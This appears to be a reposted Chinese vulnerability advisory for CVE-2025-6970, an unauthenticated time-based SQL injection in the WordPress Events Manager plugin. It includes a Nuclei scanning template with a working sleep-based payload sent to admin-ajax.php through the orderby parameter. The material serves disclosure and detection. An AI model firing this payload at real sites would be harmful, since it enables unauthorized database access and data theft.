WordPress Events Manager SQL Injection Vulnerability

漏洞信息

漏洞名称: WordPress Events Manager SQL Injection Vulnerability

漏洞编号:

  • CVE: CVE-2025-6970

漏洞类型: SQL注入

漏洞等级: 严重

漏洞描述: WordPress的Events Manager插件(日历、预订、票务等功能)在7.0.3及之前版本中存在一个未认证的SQL注入漏洞,通过orderby参数触发。此漏洞由于对用户提供的参数orderby进行了不充分的转义,并且现有SQL查询缺乏足够的准备,使得未认证的攻击者能够将额外的SQL查询附加到现有查询中,从而可能从数据库中提取敏感信息。受影响的插件广泛用于WordPress网站,用于管理事件、预订和票务。漏洞的技术根源在于输入验证不足,允许攻击者执行时间基础的SQL注入攻击。这种漏洞可能导致严重的安全风险,包括但不限于用户凭证、个人信息和其他机密数据的泄露。攻击者无需认证即可利用此漏洞,且可以自动化利用,增加了其危害性。建议立即更新插件至6.6.5或7.0.4及以上版本以修复此漏洞,或暂时禁用插件直至修复措施得以实施。

产品厂商: wp-events-plugin

产品名称: Events Manager – Calendar, Bookings, Tickets, and more!

影响版本: version <= 7.0.3

来源: https://github.com/projectdiscovery/nuclei-templates/blob/fdf11c48a0f654b23b687565ef3f2f533f638740/http%2Fcves%2F2025%2FCVE-2025-6970.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

id: CVE-2025-6970

info:
  name: WordPress Events Manager <= 7.0.3 - Unauthenticated SQL Injection via orderby Parameter
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    The Events Manager – Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to time-based SQL Injection via the 'orderby' parameter in all versions up to, and including, 7.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    An attacker can exploit this vulnerability to perform time-based SQL injection attacks, potentially extracting sensitive information from the database including user credentials, personal information, and other confidential data.
  remediation: |
    Update the Events Manager plugin to version 6.6.5 or 7.0.4 or later which fixes this vulnerability. If immediate update is not possible, consider temporarily disabling the plugin until the fix can be applied.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6970
    - https://wpscan.com/vulnerability/CVE-2025-6970
    - https://patchstack.com/database/vulnerability/events-manager/wordpress-events-manager-calendar-bookings-tickets-and-more-plugin-7-0-3-unauthenticated-sql-injection-via-orderby-parameter
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/events-manager/events-manager-703-unauthenticated-sql-injection-via-orderby-parameter
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-6970
    cwe-id: CWE-89
    epss-score: 0.00043
    epss-percentile: 0.09677
    cpe: cpe:2.3:a:wp-events-plugin:events_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wp-events-plugin
    product: events_manager
    publicwww-query: "/wp-content/plugins/events-manager/"
  tags: cve,cve2025,events-manager,sqli,time-based,wordpress,wpscan,wp-plugin,unauth

http:
  - raw:
      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=search_events&orderby=1*(select(sleep(5)))

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'em-item-info', 'em-item-title', 'em-item-desc')
          - status_code == 200
          - 'duration>=5'
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #SQL注入
WordPress Events Manager SQL Injection Vulnerability
http://example.com/2025/07/17/github_1921392890/
作者
lianccc
发布于
2025年7月17日
许可协议